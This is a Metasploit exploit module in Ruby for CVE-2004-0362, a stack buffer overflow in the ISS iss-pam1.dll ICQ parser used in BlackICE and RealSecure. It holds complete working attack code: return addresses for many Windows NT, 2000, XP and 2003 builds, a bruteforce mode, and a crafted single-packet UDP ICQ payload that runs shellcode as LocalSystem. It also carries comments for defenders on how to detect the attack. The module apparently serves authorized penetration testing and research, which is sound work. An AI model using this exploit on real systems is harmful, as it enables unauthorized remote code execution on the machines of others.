##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  # Exploit module for CVE-2004-0362, a stack buffer overflow in the ICQ parser of
  # the ISS iss-pam1.dll (BlackICE/RealSecure). Ported from msf 2 (see the comment
  # in #exploit); delivery is a single UDP datagram via Msf::Exploit::Remote::Udp.
  #
  # Detection note for defenders: each attempt is one UDP datagram sent from
  # source port 4000 (the 'CPORT' passed to connect_udp in #exploit) to either the
  # configured RPORT or a random destination port, framed as ICQ SRV_MULTI /
  # SRV_USER_ONLINE / SRV_META_USER records whose "email" field carries a 2-byte
  # length prefix followed by filler, a return address and the payload. Bruteforce
  # targets repeat this once per candidate with a 5 second pause between sends.
  Rank = GreatRanking

  include Msf::Exploit::Remote::Udp

  # Registers module metadata, payload constraints, the target table and options.
  #
  # @param info [Hash] module metadata merged through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'ISS PAM.dll ICQ Parser Buffer Overflow',
        'Description' => %q{
This module exploits a stack buffer overflow in the ISS products that use
the iss-pam1.dll ICQ parser (Blackice/RealSecure). Successful exploitation
will result in arbitrary code execution as LocalSystem. This exploit
only requires 1 UDP packet, which can be both spoofed and sent to a broadcast
address.

The ISS exception handler will recover the process after each overflow, giving
us the ability to bruteforce the service and exploit it multiple times.
        },
        'Author' => 'spoonm',
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2004-0362'],
          ['OSVDB', '4355'],
          ['URL', 'http://www.eeye.com/html/Research/Advisories/AD20040318.html']
        ],
        'Payload' => {
          # Bytes available for the encoded payload inside the ICQ "email" field;
          # #exploit pads the encoded payload with rand_text_english up to this
          # size. NOTE(review): the file does not say what the 31 and 4 stand for;
          # the header built in #exploit is 19 filler bytes + a 4-byte return
          # address, so confirm against the msf 2 original before changing them.
          'Space' => 504 - 31 - 4,
          'BadChars' => "\x00",
          'MinNops' => 0,
          'MaxNops' => 0,
          'StackAdjustment' => -3500
        },
        'Platform' => 'win',
        # The first three entries are bruteforce pseudo-targets with no 'Ret'. An
        # optional 'Targets' range lists indices into this table to try; the plain
        # 'Bruteforce' entry tries every entry from index 3 onward (see #exploit).
        'Targets' => [
          [ 'Bruteforce', {} ],
          [ 'Bruteforce iis-pam1.dll', { 'Targets' => 3..4 } ],
          [ 'Bruteforce NT 4.0', { 'Targets' => 5..15 } ],
          [ 'iis-pam1.dll 3.6.06', { 'Ret' => 0x5e0a47ef } ],
          [ 'iis-pam1.dll 3.6.11', { 'Ret' => 0x5e0da1db } ],
          [ 'WinNT SP3/SP4/SP5', { 'Ret' => 0x777e79ab } ],
          [ 'WinNT SP4/SP5', { 'Ret' => 0x7733b8db } ],
          [ 'WinNT SP5/SP6 - advapi32', { 'Ret' => 0x77dcd1cb } ],
          [ 'WinNT SP3/SP5/SP6 - shell32', { 'Ret' => 0x77cec080 } ],
          [ 'WinNT SP5/SP6 - mswsock', { 'Ret' => 0x7767ebca } ],
          [ 'WinXP SP0/SP1 - shell32', { 'Ret' => 0x776606af } ],
          [ 'WinXP SP0/SP1 - atl', { 'Ret' => 0x76b305a7 } ],
          [ 'WinXP SP0/SP1 - atl', { 'Ret' => 0x76e61a21 } ],
          [ 'WinXP SP0/SP1 - ws2_32', { 'Ret' => 0x71ab7bfb } ],
          [ 'WinXP SP0/SP1 - mswsock', { 'Ret' => 0x71a5403d } ],
          [ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x7c2ec68b } ],
          [ 'Win2000 SP0 - SP4', { 'Ret' => 0x750231e2 } ],
          [ 'Win2000 SP2/SP3 - samlib', { 'Ret' => 0x75159da3 } ],
          [ 'Win2000 SP0/SP1 - activeds', { 'Ret' => 0x77ed0beb } ],
          [ 'Windows XP Pro SP0 English', { 'Ret' => 0x77e3171b } ],
          [ 'Windows XP Pro SP1 English', { 'Ret' => 0x77dc5527 } ],
          [ 'WinXP SP0 - SP1', { 'Ret' => 0x71aa3a4b } ],
          [ 'Win2003 SP0', { 'Ret' => 0x71bf3cc9 } ],
        ],
        'DisclosureDate' => '2004-03-18',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        # A default of 1 is a sentinel: #exploit replaces it with a random port.
        Opt::RPORT(1)
      ]
    )
  end

  # Builds the ICQ datagram for each selected target and sends it over UDP, pausing
  # 5 seconds between targets so the service's exception handler can recover.
  #
  # Target selection: a non-bruteforce target is used on its own; a bruteforce
  # target with a 'Targets' range expands to those table indices, and the plain
  # 'Bruteforce' target expands to the whole table minus the three pseudo-targets.
  def exploit
    # RPORT of 1 means "pick a random port". NOTE(review): rand(65536) yields
    # 0..65535, so 0 (not a usable destination port) is a possible result.
    datastore['RPORT'] = rand(65536) if rport == 1

    targs = [ target ]

    if target.name =~ /^Brute/
      if target['Targets']
        targs = []

        # 'Targets' holds indices into the module's target table.
        target['Targets'].each { |idx|
          targs << targets[idx]
        }
      else
        targs = targets.dup

        # Drop the three bruteforce pseudo-targets at indices 0..2; only entries
        # with a 'Ret' remain.
        targs.delete_at(0)
        targs.delete_at(0)
        targs.delete_at(0)
      end
    end

    targs.each { |targ|
      print_status("Trying target #{targ.name} [#{"%.8x" % targ.ret}]...")

      # Pad the encoded payload with random text up to the declared payload space.
      shellcode = payload.encoded + rand_text_english(payload_space - payload.encoded.length)
      # ICQ "email" field: 19 filler bytes, the target's return address as a
      # little-endian 32-bit value, then the padded payload.
      email = rand_text_english(19) + [targ.ret].pack('V') + shellcode

      # Hopefully this structure is correct -- ported from msf 2. Blame me
      # (skape) if it doesn't work!
      packet =
        # SRV_MULTI
        [5, 0, 0, 530, 0, 0, 1161044754, 0, 2].pack('vcVvvvVVc') +
        # SRV_USER_ONLINE
        [5, 0, 0, 110, 0, 0, 1161044754, 0].pack('vcVvvvVV') +
        [1161044754, 1, 0, 0, 0, 0, 0].pack('VVVVcVV') +
        # SRV_META_USER
        [5, 0, 0, 990, 0, 0, 2018915346, 0].pack('vcVvvvVV') +
        "\x00\x00\x0a" + # subcommand / success
        "\x00\x00" + # nick length / nick
        "\x00\x00" + # first length / first
        "\x00\x00" + # last length / last
        # email: 2-byte little-endian length prefix followed by the field itself
        [email.length].pack('v') + email +
        "\x00\x00\x00\x00\x00\x00\x00"

      print_status("Sending UDP request to #{datastore['RPORT']} (#{packet.length} bytes)")

      # Fixed source port 4000; one datagram per target, then close the socket.
      connect_udp(true, { 'CPORT' => 4000 })
      udp_sock.put(packet)
      disconnect_udp

      print_status("Sleeping (giving exception handler time to recover)")

      # Kernel#select with no descriptor sets is used here as a 5 second pause.
      select(nil, nil, nil, 5)
    }
  end
end